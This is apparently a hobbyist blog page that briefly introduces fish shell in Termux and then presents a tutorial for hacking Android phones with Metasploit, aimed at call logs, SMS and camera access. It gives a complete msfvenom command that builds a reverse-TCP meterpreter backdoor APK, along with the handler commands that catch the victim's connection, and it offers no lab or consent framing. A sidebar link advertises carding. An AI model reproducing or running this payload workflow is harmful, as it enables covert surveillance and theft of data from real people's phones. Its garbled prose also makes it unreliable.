How to download, Install, Run and Use Fish-shell in Termux

Image
  Tutorial 1:  How We download, Install, Run and Use Fish-shell in Termux [ It Also work for non-rooted devices] What Will I Learn? How to download Fish-shell in Termux How to install Fish-shell in Termux How to run Fish-shell in Termux Today I build this Tutorial as a result of i believe there is a desire for this shell for the beginners in my future post on Termux. Thus I build this tutorial for the ability for you. Fish-shell & hacker's keyboard makes the utilization of Termux simple and that I hope you'll simply understand this tutorial and take advantage of  Fish-shell . What is Fish-shell? Fish(The Friendly Interactive Shell) a Unix (os) shell that focuses on interactive use, discover-ability and friendliness. Everything that may be done in different shell languages ought to be done in fish. It auto-complete the commands that area unit pretty cool. Fish is fully scrip-table, and its syntax is simple, clean and consistent. Fish is a fast, the auto-completion is surpris

HACKING ANDROID USING METASPLOIT

 

Hacking Android

Hack Call Logs, SMS, Camera of Remote Android Phone using Metasploit

Before doing this u have to install metasploit in u termux for that see this post Here

Open Termux 
and type below commands  and see the Explanation too.

====================
msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_system_ip> LPORT=4444 R > hack.apk

Let me explain the above Command so we are using msfvenom as the exploit generator for an android using Meterpreter for the reverse connection to the attacker’s system. LHOST defines the attackers IP address where he will get the reverse connection from the victim. And same with the LPORT connection will be made on port 4444 and R > is used to generate the executable.
Now we are all ready for the next step as this payload use reverse_tcp so the attacker will be listening to the port specified in the payload for a reverse connection from the victim.
So now we need to set up a handler to handle incoming connections to the port let’s do it.

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost <attacker_system_ip>
set lport 4444
exploit 
==========================

Remember that the LHOST & LPORT are going to be the attacker IP address and port to listen to the reverse connection. and exploit to start listening.
Now as soon as the attacker installs the APK exploit/backdoor you will get the reverse meterpreter session on you terminal like this. 
        IF U WANT ANY VIDEO RELATED IT                  COMMENT BELOW I WILL PROVIDE
    KEEP SUPPORT US TO DO BETTER WORK

Comments

Post a Comment

Popular posts from this blog

How to download, Install, Run and Use Fish-shell in Termux

MDORK IN TERMUX AND LINUX COMMANDS

HOW TO DO CARDING